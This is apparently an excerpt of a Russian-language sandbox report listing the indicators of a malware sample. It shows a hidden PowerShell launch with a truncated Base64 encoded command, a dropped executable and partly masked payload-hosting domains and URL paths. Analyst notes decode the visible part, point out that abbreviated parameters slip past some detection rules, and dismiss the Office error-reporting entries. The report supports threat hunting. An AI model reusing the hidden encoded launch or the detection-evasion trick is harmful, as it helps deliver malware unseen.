Техническая информация
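- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAGEAcwBkAHgAYQBmAGgAbgBjAG8AawA9ACcAVgBjAGoAZgB6AHkAZAB0ACcAOwAkAFEAcgBzAHAAeABrAG0AbQAgAD0AIAAnADEAOAA1ACcAOwAkAFUAbwBlAHQAbAB3AGEAeAByAG8APQAnAEIAdQBsAHcAZwB4AHMAbwBmAHoAbwA...
  Примечание: -w hidden и -en — сокращённые формы параметров -WindowStyle Hidden и -EncodedCommand; правила обнаружения, которые ищут только полные имена параметров, такой запуск пропустят. Аргумент -en — это Base64 от текста в UTF-16LE; видимая часть (строка обрезана) декодируется в $Uasdxafhncok='Vcjfzydt';$Qrspxkmm = '185';$Uoetlwaxro='Bulwgxsofzo… — присваивания переменным со случайными именами, причём значение '185' совпадает с именем файла %HOMEPATH%\185.exe ниже.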
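- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2020
- %TEMP%\911108.cvr
  Примечание: DW20.EXE по этому пути — штатный компонент отчётов об ошибках Microsoft Office; его запуск и файл .cvr в %TEMP%, по-видимому, означают лишь, что в ходе анализа сработал механизм отчёта о сбое. Как индикаторы заражения эти две записи сами по себе ненадёжны.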
- %HOMEPATH%\185.exe
- %HOMEPATH%\185.exe
- 'os##on.com':80
- 'pa###splace.com':80
- 'la####hombourg.be':80
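- http://os##on.com/css/yASnV04o/
- http://pa###splace.com/images/d5b8/
- http://www.la####hombourg.be/wp-content/TLx/
  Примечание: символы # в именах доменов (здесь, выше и ниже), судя по всему, скрывают часть имени — в именах узлов знак # недопустим. Для точного сопоставления с журналами DNS и прокси записи в таком виде не годятся; пути URL (/css/yASnV04o/, /images/d5b8/, /wp-content/TLx/) приведены без маскировки.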
- DNS ASK os##on.com
- DNS ASK pa###splace.com
- DNS ASK sh####arisales.org
- DNS ASK av#####ninsiderjobs.com
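- DNS ASK la####hombourg.be
  Примечание: sh####arisales.org и av#####ninsiderjobs.com встречаются только среди DNS-запросов — соединений с ними и HTTP-запросов к ним в этом списке нет. При поиске по журналам их стоит учитывать наравне с остальными тремя доменами.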